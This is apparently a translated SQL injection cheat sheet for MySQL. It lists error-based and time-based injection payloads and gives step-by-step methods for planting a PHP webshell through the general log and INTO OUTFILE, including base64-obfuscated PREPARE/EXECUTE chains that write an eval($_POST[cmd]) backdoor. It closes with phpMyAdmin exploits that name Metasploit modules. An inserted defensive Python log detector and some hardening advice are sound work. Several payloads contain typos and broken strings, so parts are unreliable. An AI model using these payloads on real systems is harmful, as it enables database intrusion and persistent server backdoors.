What are the SQL injection syntaxes?
SQL injection syntax
Error-based injection
updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
extractvalue(1,concat(0x7e,(select database()),0x7e),1)--+
select count(*) from information_schema.tabeles group by concat((select database(),floor(rand(0)*2)
select substr(version(),1,1)='X'
select substring(version(),1,1)='X'
Duplicate column name error
select * from (select name_const(version(),1))a;
select * from (select name_const((version()),1),name_const((select database()),1))a;
select * from (select * from users a join users b)c;
Data overflow error
select (select(!x-~0) from (select(select user())x)a);
select ~0+!(select * from (select user())x);
Geometric function error
multipoint((select * from(select * from(select user())a)b));
CASE WHEN statement
select * from datadatabase() case id when 1 else 2 end
Time-based injection
if right((select database()),a,b)>'s' sleep(5)
if assic(substr((select database()),a,b))=98 sleep(5)
if assic(substr((select database()) from a to b))=98 sleep(5)
if ord(mid((select database()),a,b))=98 sleep(5)
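Writing a shell via the log
Prerequisites
The physical path is known, the directory is writable, and root privileges are held.
View the configuration
show variables like '%general';
Enable general log mode
set global general_log=on;
Set the log file path where the shell will be written
set global general_log_file="/var/www/html/log.php";
Write the shell
select "<?php phpinfo();>";
Writing a shell via into outfile
Prerequisites
The physical path is known and the directory is writable.
select '<?php phpinfo();>' into outfile ‘/var/www/html/1.php'
Writing a shell by exporting a table
use mysql;
create table shell(shell1 text not null);
insert into shell(cmd1) values('<?php phpinfo();>');
select cmd1 from a into outfile '/var/www/html/1.php';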
Using the MySQL from_base64 function
Base64 encoding is used to obfuscate the statement, a user-defined variable receives the decoded value, and PREPARE and EXECUTE are then used to run it, completing the log-based shell write.
set
set defines a user variable whose value is an SQL statement that can be executed.
prepare
prepare name from value;
The prepare statement prepares a statement and gives it the name name, by which the statement is then referenced.
execute
The execute statement runs the prepared statement.
Combining them
set @sql1 = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg==')); /*set global general_log=on*/
PREPARE name from @sql;
EXECUTE name;
set @sql2= (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZ19maWxlPSJDOlxcTVlPQVxcd2Vicm$9$vdFxcbG9naW4ucGhwIg==')); /*set global general_log_file="C:\\MYOA\\webroot\\login.php"*/
PREPARE name from sql2;
EXECUTE name;
select "<?php eval($_POST[cmd]); ?>";
set @sql3 := (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZyA9IG9mZg==')); /*set global general_log = off*/
PREPARE name from @sql3;
EXECUTE name;
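Seen from the defender's side, the statements in the file-write sections above stand out in a MySQL query log, and wrapping them in from_base64 does not hide them once the literal is decoded. The Python detector below is an added example, not code from the original page; its rule names, function names and sample log lines are constructed for illustration.

```python
import base64
import binascii
import re

# Patterns for the file-write statements listed on this page (rule names are hypothetical).
RULES = {
    "general_log_redirect": re.compile(r"set\s+global\s+general_log_file\s*=", re.I),
    "general_log_toggle": re.compile(r"set\s+global\s+general_log\s*=", re.I),
    "into_outfile": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "prepare_from_variable": re.compile(r"\bprepare\s+\w+\s+from\s+@?\w+", re.I),
}
B64_CALL = re.compile(r"from_base64\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def decode_layers(statement):
    """Return the statement plus the plaintext of each from_base64() literal in it."""
    texts = [statement]
    for blob in B64_CALL.findall(statement):
        try:
            texts.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # undecodable literal: the literal itself is still flagged in scan()
    return texts


def scan(statement):
    """Return the sorted rule names matched by the statement or its decoded literals."""
    hits = {"from_base64_literal"} if B64_CALL.search(statement) else set()
    for text in decode_layers(statement):
        for name, pattern in RULES.items():
            if pattern.search(text):
                hits.add(name)
    return sorted(hits)


def report(lines):
    """Return (line, hits) pairs for every line that matched at least one rule."""
    results = [(line, scan(line)) for line in lines]
    return [(line, hits) for line, hits in results if hits]


# Constructed sample statements, modelled on a MySQL general query log.
SAMPLE_LOG = [
    "SELECT id, name FROM products WHERE id = 7",
    "set @s = (select from_base64('c2V0IGdsb2JhbCBnZW5lcmFsX2xvZz1vbg=='))",
    "PREPARE name from @s",
    "select name from users into outfile '/tmp/export.csv'",
]
```

Alerting of this kind complements removing the FILE privilege and global-variable rights from the application's database account and restricting export paths with secure_file_priv, which take away the prerequisites the sections above list.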
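phpMyAdmin vulnerability collection
phpMyAdmin has a pregreplaceeval vulnerability
Affected versions: 3.5.x
phpMyAdmin has a serversync.php backdoor vulnerability
Affected version: phpmyadmin v3.5.2.2
msf exploit module: exploit/multi/http/phpmyadmin3522_backdoor CVE-2012-5159
The phpMyAdmin configuration file /config/config.inc.php has a command-execution vulnerability
Affected versions: 2.11.x
msf exploit module: exploit/unix/webapp/phpmyadmin_config CVE-2009-1151
Login page vulnerability
Exploitation method: enter 'localhost'@'@" in the username field
Affected versions: 2.113/2.114
Absolute path disclosure via PHP
phpMyAdmin/libraries/selectlang.lib.php
phpMyAdmin/darkblueorange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php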